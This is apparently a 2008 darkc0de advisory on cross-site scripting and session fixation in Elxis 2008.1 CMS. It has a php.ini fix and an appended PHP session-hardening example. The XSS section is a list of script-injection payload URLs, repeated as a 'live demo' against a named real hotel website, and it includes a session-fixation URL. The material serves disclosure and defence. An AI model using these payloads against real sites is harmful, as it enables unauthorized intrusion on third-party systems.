Elxis 2008.1 Nemesis suffers from multiple cross-site scripting vulnerabilities.
################################################################
# darkc0de crew, est.2007                   forum.darkc0de.com #
################################################################
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 #
# -C1c4Tr1Z -Gabitzu and all darkc0de members #
;###############################################################
#
# Author: swappie [aka] faithlove
#
# Home : www.darkc0de.com
#
# Email : swappieakafaithlove@gmail.com
#
# Do researching and share!
#
;###############################################################
#
# Title: Elxis 2008.1 Nemesis
#
# Issue Date: Monday, 29 September 2008
#
# CMS Link: https://www.elxis-downloads.com/fserver/96.html
# Vendor: https://www.elxis.org/
#
#
;###############################################################
#
# Dork: I'm sure you can figure that by yourself, right?
#
#################################################################
----------
XSS Vulns;
----------
https://www.site.com/?>'"><script>alert("XSS Vuln")</script>
https://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>
https://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>
https://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
https://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
https://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
https://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
https://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>
----------
Live Demo;
----------
https://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>
https://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>
https://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>
https://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
https://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
https://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
https://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
https://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>
;==================================================================;
;==================================================================;
-----------------
Session Fixation;
-----------------
https://www.site.com/?PHPSESSID=[session_fixation]
Explanation:
The attacker can fix the user's session ID before the user even logs on
to the target server, so there is no need to obtain the session ID
afterwards.
How to fix the session fixation?
There is a simple way to do it.
Step 1.
Open the php.ini file on your server.
Step 2.
Look through the file for the following lines:
; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.
; session.use_only_cookies = 1 !![PLEASE NOTE THE ";"]!!
Step 3.
Remove the leading ";" so the line looks like this:
; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.
session.use_only_cookies = 1
Step 4.
Restart the web server, php, whatever.
Cheers,
swappie [aka] faithlove
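
Added example, not part of the original advisory and not Elxis code: the php.ini setting from the steps above applied and verified at runtime, plus regenerating the session ID at login, which also invalidates an ID planted by some means other than the URL. Assumes PHP 7.1 or later; login_user() and $verifiedUserId are hypothetical names.

```php
<?php
// Added example. login_user() and $verifiedUserId are hypothetical names,
// not taken from Elxis.

// Runtime equivalent of the php.ini change; must run before session_start().
ini_set('session.use_only_cookies', '1'); // ignore a PHPSESSID passed in the URL
ini_set('session.use_trans_sid', '0');    // never rewrite links to carry the session ID
ini_set('session.use_strict_mode', '1');  // reject IDs the server did not issue (PHP >= 5.5.2)
ini_set('session.cookie_httponly', '1');  // keep the cookie away from injected script

// A session ID in the query string matches the fixation URL shown above.
// With use_only_cookies on it is ignored, but it is still worth logging.
if (isset($_GET[session_name()])) {
    error_log('Session ID supplied in URL from ' . $_SERVER['REMOTE_ADDR']);
}

session_start();

// Fail closed if the hosting configuration overrode the setting.
if (!filter_var(ini_get('session.use_only_cookies'), FILTER_VALIDATE_BOOLEAN)) {
    session_destroy();
    http_response_code(500);
    exit('session.use_only_cookies is disabled');
}

function login_user(int $verifiedUserId): void
{
    // Issue a fresh ID at the moment of authentication and delete the old
    // session record, so an ID fixed before login is useless afterwards.
    session_regenerate_id(true);

    // Start from a clean session so nothing set before login carries over.
    $_SESSION = ['user_id' => $verifiedUserId, 'created' => time()];
}
```

Call login_user() only after the credentials have been checked, and before any output is sent so the new session cookie can be set.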